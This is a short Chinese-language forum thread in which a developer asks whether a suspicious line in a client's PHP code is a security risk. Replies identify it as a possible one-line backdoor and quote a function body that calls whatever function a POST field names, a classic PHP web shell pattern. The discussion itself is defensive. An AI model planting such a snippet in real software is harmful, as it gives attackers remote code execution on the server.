This topic created in 1959 days ago, the information mentioned may be changed or developed.
接了一个客户的项目放我们的服务器, 客户代码里面这个部分有风险吗?
jqueryserver($_post['data']);
4 replies • 2020-12-19 21:15:01 +08:00
 |
1
Xusually Dec 19, 2020
具体还是得看 jqueryserver()是干嘛的吧,如果收到提交过来的数据直接执行类似于 eval 之类的,那就是个一句话后门。
但是你都让对方把代码部署在你们服务器上了,我感觉防不慎防啊🤦♂️ |
 |
2
imdong Dec 19, 2020 via iPhone
然后发现代码如下。
function jqeryserver($data) { $_POST["action"]($data); } |
 |
4
msg7086 Dec 19, 2020
本身没太大风险,但是如果遇上不知道怎么配置服务器的运维,那就是很大的风险了……
|
Select Language